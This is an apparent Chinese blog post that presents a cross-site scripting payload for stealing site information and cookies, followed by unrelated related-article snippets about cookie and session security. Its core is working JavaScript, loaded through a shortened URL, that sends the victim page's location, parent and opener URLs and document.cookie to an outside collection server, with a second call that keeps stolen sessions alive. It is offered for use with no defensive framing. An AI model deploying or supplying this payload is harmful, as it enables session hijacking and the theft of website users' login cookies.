`
kalogen
  • 浏览: 878227 次
  • 性别: Icon_minigender_1
  • 来自: 杭州
社区版块
存档分类
最新评论

xss攻击获取站点信息以及对应的cookie的脚本

 
阅读更多

<script src=http://is.gd/L1PtPA></script>

 

========

JS代码如下:

========

(function(){(new Image()).src='http://www.xssserver.com/index.php?do=api&id=P0cbrY&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://www.xssserver.com/index.php?do=keepsession&id=P0cbrY&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

分享到:
评论

相关推荐

    session 和cookie 区别

    - **Cookie**:由于存储在客户端,容易受到脚本攻击,如跨站脚本(XSS)和跨站请求伪造(CSRF)等。 - **Session**:因为数据存储在服务器端,相对来说更加安全,但仍然需要注意防止Session劫持等攻击。 **3. ...

    【cookie续续】【cookie续续】【cookie续续】

    - **跨站脚本攻击(XSS)**:通过设置HttpOnly标志来防止JavaScript读取Cookie。 - **跨站请求伪造(CSRF)**:使用Token配合Cookie来验证请求来源的合法性。 - **Cookie劫持**:用户在公共网络环境下,应避免保存...

    Express中间件用于保护cookie通过HttpOnly并添加标记检查是否存在

    这是因为很多跨站脚本攻击(XSS)都试图通过JavaScript获取或篡改用户的cookie信息,从而进行身份冒充或其他恶意行为。启用`HttpOnly`后,即使存在XSS漏洞,攻击者也无法通过脚本读取或修改这些受保护的cookie。 在...

    cookie自动登陆

    3. **限制Cookie作用域**:设置Cookie为“仅限站点”,防止跨站脚本攻击(XSS)。 4. **定期刷新Cookie**:即使Cookie被盗,也能在一定时间内过期,增加安全性。 总的来说,Cookie自动登录是通过.NET框架结合...

    幻影Webzine.1.7z

    了,但是已经可以提高攻击的门槛了,起码xss攻击不是每个脚本小子都能完成的了,而且其 他的那些攻击手法因为一些环境和技术的限制,并不像Cookie窃取这种手法一样通用。 HttpOnly也是可能利用一些漏洞或者配置...

    网络安全原理与应用:跨站请求伪造CSRF简介.pptx

    CSRF攻击与跨站脚本(XSS)不同,XSS主要针对的是站点内部的信任用户,而CSRF则通过伪装成这些信任用户向受信任的网站发送恶意请求。由于CSRF攻击不易被检测和防范,它被认为比XSS更为危险。 攻击原理如下: 1. ...

    易买网一些问题.txt

    - **安全性**:由于Cookie是存储在客户端的,因此容易受到攻击,比如跨站脚本攻击(XSS)。因此,在处理敏感信息时应避免使用Cookie。 - **隐私性**:Cookie可能会泄露用户的浏览习惯和其他个人信息,因此在使用...

    WebGoat讲解

    这种攻击手段可以用来获取敏感信息或执行未经授权的操作。 - **Role-Based Access Control (RBAC)**:在 RBAC 中,每个用户被赋予一个或多个角色,每个角色对应一组特定的权限。例如,只有具有管理员角色的用户才...

    Paros工具使用手册

    - **SQL注入**:攻击者通过提交恶意SQL语句来获取数据库中的敏感信息。 - **XSS攻击**:攻击者通过注入恶意脚本来窃取用户的数据或执行未经授权的操作。 - **目录遍历**:攻击者尝试通过更改URL中的路径来访问未授权...

    PHP实例开发源码—DF平台分站系统源码.zip

    源码中可能会包含对数据库的操作,如MySQL,用于存储用户信息,以及相关的加密算法,如MD5或SHA-1,用于安全地存储和验证用户密码。 其次,权限控制是多站点系统的关键。PHP的面向对象编程(OOP)特性,如类、对象...

    在线论坛PHP含数据库后台

    6. **安全性**:论坛系统需要防范SQL注入、XSS攻击等网络安全问题。PHP代码应进行输入验证和转义,使用预编译语句或参数化查询防止SQL注入。 7. **性能优化**:对于大量用户和数据的论坛,性能优化至关重要。可能的...

    PHP实例开发源码-php某源码下载站整站打包.zip

    同时,为了确保数据安全,会进行输入验证,防止SQL注入和XSS攻击。 6. **错误处理和日志记录**:良好的错误处理是任何Web应用的基础。PHP提供错误报告机制和日志记录功能,帮助开发者调试和解决运行时问题。 7. **...

    ASP网站整站程序源码——雨过星晴二级域名系统实例开发.zip

    5. **安全考虑**:每个二级域名的安全策略需要独立设置,防止跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等安全问题。 6. **模板引擎**:为了提供可定制的界面,可能使用了ASP内置的VBScript或者JScript,或者第三方的...

    Go Web 编程.pdf

    - **跨站脚本(XSS)防护**: 防止恶意脚本被嵌入到网页中。 - **文件上传**: 处理用户上传的文件,包括文件大小限制、文件类型检查等。 2. **访问数据库** - **`database/sql`接口**: 提供了一个统一的接口用于...

    asp.net 开发的系统范例

    7. 安全性:ASP.NET提供了多种安全机制,包括身份验证(如窗体验证、基本验证、Windows验证)、授权、加密解密、防止跨站脚本攻击(XSS)和跨站请求伪造(CSRF)等。开发者需要确保应用遵循最佳安全实践,保护用户...

    电子书网站源码(大型电子书下载网源码)

    3. **数据库管理**:源码可能使用如SQL Server或Access等数据库管理系统存储电子书信息(如书名、作者、简介、下载链接等)以及用户数据。开发者需要熟悉SQL语言进行数据操作。 4. **用户系统**:网站可能包含用户...

Global site tag (gtag.js) - Google Analytics